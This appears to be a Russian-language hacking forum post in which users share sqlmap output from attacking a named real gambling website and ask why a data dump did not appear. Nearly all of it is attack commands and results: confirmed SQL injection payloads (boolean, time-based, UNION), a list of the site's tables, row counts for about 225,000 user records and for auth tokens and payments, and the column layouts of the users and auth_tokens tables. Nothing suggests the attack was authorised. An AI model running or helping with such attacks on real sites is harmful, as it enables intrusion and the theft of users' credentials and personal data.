[07:56:12] [INFO] fetching tables for database: 'sattaz'
[07:56:15] [WARNING] reflective value(s) found and filtering out
Database: sattaz
[53 tables]
+----------------------------+
| admin_shortcuts            |
| ads                        |
| agents                     |
| auth_tokens                |
| banned_fingerprints        |
| blog                       |
| cached_responses           |
| charts                     |
| chat                       |
| chat_conversations         |
| chat_messages              |
| chat_signals               |
| contact_messages           |
| contact_replies            |
| faqs                       |
| feedback                   |
| forum                      |
| forum_replies              |
| guessing_z                 |
| info                       |
| keywords                   |
| kolkataff                  |
| kolkataff_guessing         |
| market_admin               |
| markets                    |
| membership                 |
| notification_events        |
| notification_log           |
| notification_subscriptions |
| offer                      |
| offers                     |
| pay_modes                  |
| payment_notifications      |
| payments                   |
| plans                      |
| referrals                  |
| refers                     |
| satta_charts               |
| satta_forum                |
| satta_guessing             |
| satta_market_admin         |
| satta_markets              |
| searches                   |
| settings                   |
| sites                      |
| ticket_email_queue         |
| tokens                     |
| user_notifications         |
| users                      |
| vip_games                  |
| vip_games_kolkataff        |
| votes_forum                |
| withdrawals                |
+----------------------------+

[07:56:16] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/sattaz.com'

[*] ending @ 07:56:16 /2025-09-29/

(myenv) root@E02S29:~# sqlmap -u "https://sattaz.com/guessing/kalyan" --risk=3 --level=5 --batch --random-agent -D sattaz --count
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.9.9#pip}
|_ -| . [.]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 07:56:32 /2025-09-29/

[07:56:32] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.67 Safari/537.36 Edg/87.0.664.47' from file '/root/myenv/lib/python3.12/site-packages/sqlmap/data/txt/user-agents.txt'
[07:56:32] [WARNING] you've provided target URL without any GET parameters (e.g. 'http://www.site.com/article.php?id=1') and without providing any POST parameters through option '--data'
do you want to try URI injections in the target URL itself? [Y/n/q] Y
[07:56:32] [INFO] resuming back-end DBMS 'mysql'
[07:56:32] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: https://sattaz.com/guessing/kalyan' AND 8075=8075 AND 'iChZ'='iChZ

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: https://sattaz.com/guessing/kalyan' AND (SELECT 7190 FROM (SELECT(SLEEP(5)))PBeK) AND 'tRMg'='tRMg

    Type: UNION query
    Title: Generic UNION query (NULL) - 12 columns
    Payload: https://sattaz.com/guessing/kalyan' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162766a71,0x7775535641746555495851446755626e584442734b6b675978484965466f45587252696751686542,0x7176706b71),NULL-- -
---
[07:56:33] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL >= 5.0.12
[07:56:33] [WARNING] missing table parameter, sqlmap will retrieve the number of entries for all database management system databases' tables
[07:56:33] [INFO] fetching tables for database: 'sattaz'
[07:56:36] [WARNING] reflective value(s) found and filtering out
Database: sattaz
+-----------------------+---------+
| Table                 | Entries |
+-----------------------+---------+
| users                 | 224785  |
| vip_games             | 164765  |
| auth_tokens           | 79586   |
| charts                | 59974   |
| payments              | 45812   |
| chat_conversations    | 25289   |
| guessing_z            | 22191   |
| keywords              | 13720   |
| votes_forum           | 13243   |
| chat_messages         | 10093   |
| forum                 | 8523    |
| satta_charts          | 8129    |
| kolkataff_guessing    | 6136    |
| vip_games_kolkataff   | 5243    |
| membership            | 4697    |
| satta_guessing        | 2618    |
| forum_replies         | 1786    |
| payment_notifications | 1274    |
| cached_responses      | 988     |
| kolkataff             | 791     |
| sites                 | 329     |
| chat                  | 322     |
| refers                | 72      |
| markets               | 52      |
| contact_messages      | 36      |
| plans                 | 28      |
| feedback              | 27      |
| tokens                | 24      |
| referrals             | 20      |
| banned_fingerprints   | 17      |
| ads                   | 13      |
| settings              | 13      |
| contact_replies       | 12      |
| agents                | 9       |
| withdrawals           | 7       |
| faqs                  | 6       |
| satta_forum           | 6       |
| blog                  | 5       |
| offers                | 4       |
| pay_modes             | 4       |
| satta_market_admin    | 4       |
| satta_markets         | 4       |
| notification_events   | 2       |
| admin_shortcuts       | 1       |
| info                  | 1       |
| market_admin          | 1       |
| offer                 | 1       |
+-----------------------+---------+

[07:58:36] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/sattaz.com'

[*] ending @ 07:58:36 /2025-09-29/

(myenv) root@E02S29:~# sqlmap -u "https://sattaz.com/guessing/kalyan" --risk=3 --level=5 --batch --random-agent -D sattaz -T users --columns
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.9.9#pip}
|_ -| . ["]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 07:59:00 /2025-09-29/

[07:59:00] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36' from file '/root/myenv/lib/python3.12/site-packages/sqlmap/data/txt/user-agents.txt'
[07:59:00] [WARNING] you've provided target URL without any GET parameters (e.g. 'http://www.site.com/article.php?id=1') and without providing any POST parameters through option '--data'
do you want to try URI injections in the target URL itself? [Y/n/q] Y
[07:59:00] [INFO] resuming back-end DBMS 'mysql'
[07:59:00] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: https://sattaz.com/guessing/kalyan' AND 8075=8075 AND 'iChZ'='iChZ

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: https://sattaz.com/guessing/kalyan' AND (SELECT 7190 FROM (SELECT(SLEEP(5)))PBeK) AND 'tRMg'='tRMg

    Type: UNION query
    Title: Generic UNION query (NULL) - 12 columns
    Payload: https://sattaz.com/guessing/kalyan' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162766a71,0x7775535641746555495851446755626e584442734b6b675978484965466f45587252696751686542,0x7176706b71),NULL-- -
---
[07:59:01] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL >= 5.0.12
[07:59:01] [INFO] fetching columns for table 'users' in database 'sattaz'
[07:59:04] [WARNING] reflective value(s) found and filtering out
Database: sattaz
Table: users
[13 columns]
+------------+--------------+
| Column     | Type         |
+------------+--------------+
| rank       | int unsigned |
| status     | int unsigned |
| user       | varchar(20)  |
| about      | text         |
| gid        | char(21)     |
| id         | int unsigned |
| mail       | varchar(50)  |
| mobile     | varchar(10)  |
| pass       | varchar(60)  |
| privilege  | int unsigned |
| regon      | timestamp    |
| verify     | varchar(50)  |
| verify_exp | int          |
+------------+--------------+

[07:59:05] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/sattaz.com'

[*] ending @ 07:59:05 /2025-09-29/

кекич · 02.10.2025

MrDark сказал(а):

Код:

(myenv) root@E02S29:~# sqlmap -u "https://sattaz.com/guessing/kalyan" --delay=6 --dbs --risk=3 --level=5 --batch --random-agent
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.9.9#pip}
|_ -| . [)]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 07:43:27 /2025-09-29/

[07:43:27] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-DE) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.202.2 Safari/532.0' from file '/root/myenv/lib/python3.12/site-packages/sqlmap/data/txt/user-agents.txt'
[07:43:27] [WARNING] you've provided target URL without any GET parameters (e.g. 'http://www.site.com/article.php?id=1') and without providing any POST parameters through option '--data'
do you want to try URI injections in the target URL itself? [Y/n/q] Y
[07:43:27] [INFO] testing connection to the target URL
[07:43:35] [INFO] checking if the target is protected by some kind of WAF/IPS
[07:43:42] [INFO] testing if the target URL content is stable
[07:43:49] [INFO] target URL content is stable
[07:43:49] [INFO] testing if URI parameter '#1*' is dynamic
got a 302 redirect to 'https://sattaz.com/'. Do you want to follow? [Y/n] Y
[07:43:57] [INFO] URI parameter '#1*' appears to be dynamic
[07:44:03] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable
[07:44:10] [INFO] testing for SQL injection on URI parameter '#1*'
[07:44:10] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[07:44:32] [WARNING] reflective value(s) found and filtering out
[07:47:03] [INFO] URI parameter '#1*' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --code=200)
[07:49:19] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'MySQL'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
[07:49:19] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[07:49:26] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[07:49:32] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[07:49:39] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[07:49:45] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[07:49:52] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[07:49:58] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[07:50:04] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[07:50:11] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[07:50:17] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[07:50:24] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[07:50:30] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[07:50:37] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[07:50:43] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[07:50:49] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[07:50:56] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[07:51:02] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[07:51:16] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[07:51:23] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[07:51:23] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[07:51:23] [INFO] testing 'MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)'
[07:51:23] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[07:51:23] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[07:51:23] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[07:51:23] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[07:51:23] [INFO] testing 'Generic inline queries'
[07:51:29] [INFO] testing 'MySQL inline queries'
[07:51:36] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[07:51:43] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[07:51:49] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[07:51:56] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[07:52:02] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[07:52:08] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[07:52:15] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[07:52:54] [INFO] URI parameter '#1*' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[07:52:54] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[07:52:54] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[07:53:09] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[07:53:44] [INFO] target URL appears to have 12 columns in query
[07:54:09] [INFO] URI parameter '#1*' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 87 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: https://sattaz.com/guessing/kalyan' AND 8075=8075 AND 'iChZ'='iChZ

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: https://sattaz.com/guessing/kalyan' AND (SELECT 7190 FROM (SELECT(SLEEP(5)))PBeK) AND 'tRMg'='tRMg

    Type: UNION query
    Title: Generic UNION query (NULL) - 12 columns
    Payload: https://sattaz.com/guessing/kalyan' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162766a71,0x7775535641746555495851446755626e584442734b6b675978484965466f45587252696751686542,0x7176706b71),NULL-- -
---
[07:54:18] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL >= 5.0.12
[07:55:20] [INFO] fetching database names
available databases [3]:
[*] information_schema
[*] performance_schema
[*] sattaz

[07:55:28] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 57 times
[07:55:28] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/sattaz.com'

[*] ending @ 07:55:28 /2025-09-29/

(myenv) root@E02S29:~# sqlmap -u "https://sattaz.com/guessing/kalyan" --risk=3 --level=5 --batch --random-agent -D sattaz --tables
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.9.9#pip}
|_ -| . [(]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 07:56:11 /2025-09-29/

[07:56:11] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.13 (KHTML, like Gecko) Chrome/24.0.1290.1 Safari/537.13' from file '/root/myenv/lib/python3.12/site-packages/sqlmap/data/txt/user-agents.txt'
[07:56:11] [WARNING] you've provided target URL without any GET parameters (e.g. 'http://www.site.com/article.php?id=1') and without providing any POST parameters through option '--data'
do you want to try URI injections in the target URL itself? [Y/n/q] Y
[07:56:11] [INFO] resuming back-end DBMS 'mysql'
[07:56:11] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: https://sattaz.com/guessing/kalyan' AND 8075=8075 AND 'iChZ'='iChZ

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: https://sattaz.com/guessing/kalyan' AND (SELECT 7190 FROM (SELECT(SLEEP(5)))PBeK) AND 'tRMg'='tRMg

    Type: UNION query
    Title: Generic UNION query (NULL) - 12 columns
    Payload: https://sattaz.com/guessing/kalyan' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162766a71,0x7775535641746555495851446755626e584442734b6b675978484965466f45587252696751686542,0x7176706b71),NULL-- -
---
[07:56:12] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL >= 5.0.12
[07:56:12] [INFO] fetching tables for database: 'sattaz'
[07:56:15] [WARNING] reflective value(s) found and filtering out
Database: sattaz
[53 tables]
+----------------------------+
| admin_shortcuts            |
| ads                        |
| agents                     |
| auth_tokens                |
| banned_fingerprints        |
| blog                       |
| cached_responses           |
| charts                     |
| chat                       |
| chat_conversations         |
| chat_messages              |
| chat_signals               |
| contact_messages           |
| contact_replies            |
| faqs                       |
| feedback                   |
| forum                      |
| forum_replies              |
| guessing_z                 |
| info                       |
| keywords                   |
| kolkataff                  |
| kolkataff_guessing         |
| market_admin               |
| markets                    |
| membership                 |
| notification_events        |
| notification_log           |
| notification_subscriptions |
| offer                      |
| offers                     |
| pay_modes                  |
| payment_notifications      |
| payments                   |
| plans                      |
| referrals                  |
| refers                     |
| satta_charts               |
| satta_forum                |
| satta_guessing             |
| satta_market_admin         |
| satta_markets              |
| searches                   |
| settings                   |
| sites                      |
| ticket_email_queue         |
| tokens                     |
| user_notifications         |
| users                      |
| vip_games                  |
| vip_games_kolkataff        |
| votes_forum                |
| withdrawals                |
+----------------------------+

[07:56:16] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/sattaz.com'

[*] ending @ 07:56:16 /2025-09-29/

(myenv) root@E02S29:~# sqlmap -u "https://sattaz.com/guessing/kalyan" --risk=3 --level=5 --batch --random-agent -D sattaz --count
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.9.9#pip}
|_ -| . [.]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 07:56:32 /2025-09-29/

[07:56:32] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.67 Safari/537.36 Edg/87.0.664.47' from file '/root/myenv/lib/python3.12/site-packages/sqlmap/data/txt/user-agents.txt'
[07:56:32] [WARNING] you've provided target URL without any GET parameters (e.g. 'http://www.site.com/article.php?id=1') and without providing any POST parameters through option '--data'
do you want to try URI injections in the target URL itself? [Y/n/q] Y
[07:56:32] [INFO] resuming back-end DBMS 'mysql'
[07:56:32] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: https://sattaz.com/guessing/kalyan' AND 8075=8075 AND 'iChZ'='iChZ

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: https://sattaz.com/guessing/kalyan' AND (SELECT 7190 FROM (SELECT(SLEEP(5)))PBeK) AND 'tRMg'='tRMg

    Type: UNION query
    Title: Generic UNION query (NULL) - 12 columns
    Payload: https://sattaz.com/guessing/kalyan' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162766a71,0x7775535641746555495851446755626e584442734b6b675978484965466f45587252696751686542,0x7176706b71),NULL-- -
---
[07:56:33] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL >= 5.0.12
[07:56:33] [WARNING] missing table parameter, sqlmap will retrieve the number of entries for all database management system databases' tables
[07:56:33] [INFO] fetching tables for database: 'sattaz'
[07:56:36] [WARNING] reflective value(s) found and filtering out
Database: sattaz
+-----------------------+---------+
| Table                 | Entries |
+-----------------------+---------+
| users                 | 224785  |
| vip_games             | 164765  |
| auth_tokens           | 79586   |
| charts                | 59974   |
| payments              | 45812   |
| chat_conversations    | 25289   |
| guessing_z            | 22191   |
| keywords              | 13720   |
| votes_forum           | 13243   |
| chat_messages         | 10093   |
| forum                 | 8523    |
| satta_charts          | 8129    |
| kolkataff_guessing    | 6136    |
| vip_games_kolkataff   | 5243    |
| membership            | 4697    |
| satta_guessing        | 2618    |
| forum_replies         | 1786    |
| payment_notifications | 1274    |
| cached_responses      | 988     |
| kolkataff             | 791     |
| sites                 | 329     |
| chat                  | 322     |
| refers                | 72      |
| markets               | 52      |
| contact_messages      | 36      |
| plans                 | 28      |
| feedback              | 27      |
| tokens                | 24      |
| referrals             | 20      |
| banned_fingerprints   | 17      |
| ads                   | 13      |
| settings              | 13      |
| contact_replies       | 12      |
| agents                | 9       |
| withdrawals           | 7       |
| faqs                  | 6       |
| satta_forum           | 6       |
| blog                  | 5       |
| offers                | 4       |
| pay_modes             | 4       |
| satta_market_admin    | 4       |
| satta_markets         | 4       |
| notification_events   | 2       |
| admin_shortcuts       | 1       |
| info                  | 1       |
| market_admin          | 1       |
| offer                 | 1       |
+-----------------------+---------+

[07:58:36] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/sattaz.com'

[*] ending @ 07:58:36 /2025-09-29/

(myenv) root@E02S29:~# sqlmap -u "https://sattaz.com/guessing/kalyan" --risk=3 --level=5 --batch --random-agent -D sattaz -T users --columns
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.9.9#pip}
|_ -| . ["]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 07:59:00 /2025-09-29/

[07:59:00] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36' from file '/root/myenv/lib/python3.12/site-packages/sqlmap/data/txt/user-agents.txt'
[07:59:00] [WARNING] you've provided target URL without any GET parameters (e.g. 'http://www.site.com/article.php?id=1') and without providing any POST parameters through option '--data'
do you want to try URI injections in the target URL itself? [Y/n/q] Y
[07:59:00] [INFO] resuming back-end DBMS 'mysql'
[07:59:00] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: https://sattaz.com/guessing/kalyan' AND 8075=8075 AND 'iChZ'='iChZ

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: https://sattaz.com/guessing/kalyan' AND (SELECT 7190 FROM (SELECT(SLEEP(5)))PBeK) AND 'tRMg'='tRMg

    Type: UNION query
    Title: Generic UNION query (NULL) - 12 columns
    Payload: https://sattaz.com/guessing/kalyan' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162766a71,0x7775535641746555495851446755626e584442734b6b675978484965466f45587252696751686542,0x7176706b71),NULL-- -
---
[07:59:01] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL >= 5.0.12
[07:59:01] [INFO] fetching columns for table 'users' in database 'sattaz'
[07:59:04] [WARNING] reflective value(s) found and filtering out
Database: sattaz
Table: users
[13 columns]
+------------+--------------+
| Column     | Type         |
+------------+--------------+
| rank       | int unsigned |
| status     | int unsigned |
| user       | varchar(20)  |
| about      | text         |
| gid        | char(21)     |
| id         | int unsigned |
| mail       | varchar(50)  |
| mobile     | varchar(10)  |
| pass       | varchar(60)  |
| privilege  | int unsigned |
| regon      | timestamp    |
| verify     | varchar(50)  |
| verify_exp | int          |
+------------+--------------+

[07:59:05] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/sattaz.com'

[*] ending @ 07:59:05 /2025-09-29/

не подскажешь? почему я вроде сделал дамп, его нет негде(

Код:

PS C:\Users\user\OneDrive\Desktop\sqlmapproject-sqlmap-71a12bf> py sqlmap.py -u "https://sattaz.com/guessing/kalyan" \ --random-agent --batch \ --risk=1 --level=2 \ -D sattaz -T auth_tokens --columns \ --threads=1 --delay=1 -v 3

        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.9.9.4#dev}
|_ -| . [)]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 18:53:31 /2025-09-29/

[18:53:31] [DEBUG] cleaning up configuration parameters
[18:53:31] [DEBUG] setting the HTTP timeout
[18:53:31] [DEBUG] setting the HTTP User-Agent header
[18:53:31] [DEBUG] loading random HTTP User-Agent header(s) from file 'C:\Users\user\OneDrive\Desktop\sqlmapproject-sqlmap-71a12bf\data\txt\user-agents.txt'
[18:53:31] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0' from file 'C:\Users\user\OneDrive\Desktop\sqlmapproject-sqlmap-71a12bf\data\txt\user-agents.txt'
[18:53:31] [DEBUG] creating HTTP requests opener object
[18:53:32] [WARNING] you've provided target URL without any GET parameters (e.g. 'http://www.site.com/article.php?id=1') and without providing any POST parameters through option '--data'
do you want to try URI injections in the target URL itself? [Y/n/q] Y
[18:53:32] [DEBUG] used the default behavior, running in batch mode
[18:53:32] [INFO] resuming back-end DBMS 'mysql'
[18:53:32] [DEBUG] resolving hostname 'sattaz.com'
[18:53:32] [INFO] testing connection to the target URL
[18:53:34] [DEBUG] declared web page charset 'utf-8'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: https://sattaz.com/guessing/kalyan' AND 3128=3128 AND 'bkro'='bkro
    Vector: AND [INFERENCE]

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: https://sattaz.com/guessing/kalyan' AND (SELECT 5069 FROM (SELECT(SLEEP(5)))bPdu) AND 'LtnB'='LtnB
    Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])

    Type: UNION query
    Title: Generic UNION query (NULL) - 12 columns
    Payload: https://sattaz.com/guessing/kalyan' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170767671,0x5845694c6b505445616662576a574e794f727364726a4a63634d4f4d53744878534246766e455a50,0x716a6a7871),NULL,NULL,NULL-- -
    Vector:  UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,[QUERY],NULL,NULL,NULL-- -
---
[18:53:34] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL >= 5.0.12
[18:53:34] [INFO] fetching columns for table 'auth_tokens' in database 'sattaz'
[18:53:34] [DEBUG] resuming configuration option 'code' (200)
[18:53:34] [PAYLOAD] kalyan' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170767671,JSON_ARRAYAGG(CONCAT_WS(0x6d6a67777966,IFNULL(CAST(column_name AS NCHAR),0x20),IFNULL(CAST(column_type AS NCHAR),0x20))),0x716a6a7871),NULL,NULL,NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x617574685f746f6b656e73 AND table_schema=0x73617474617a-- -
[18:53:38] [WARNING] reflective value(s) found and filtering out
[18:53:38] [DEBUG] performed 1 query in 3.90 seconds
Database: sattaz
Table: auth_tokens
[5 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| hash     | char(64)     |
| expires  | datetime     |
| id       | int unsigned |
| selector | char(12)     |
| uid      | int unsigned |
+----------+--------------+

[18:53:38] [INFO] fetched data logged to text files under 'C:\Users\user\AppData\Local\sqlmap\output\sattaz.com'

[*] ending @ 18:53:38 /2025-09-29/

PS C:\Users\user\OneDrive\Desktop\sqlmapproject-sqlmap-71a12bf> py sqlmap.py -u "https://sattaz.com/guessing/kalyan" \ --random-agent --batch \ --risk=1 --level=2 \ -D sattaz -T tokens --columns \ --threads=1 --delay=1 -v 3
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.9.9.4#dev}
|_ -| . [(]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
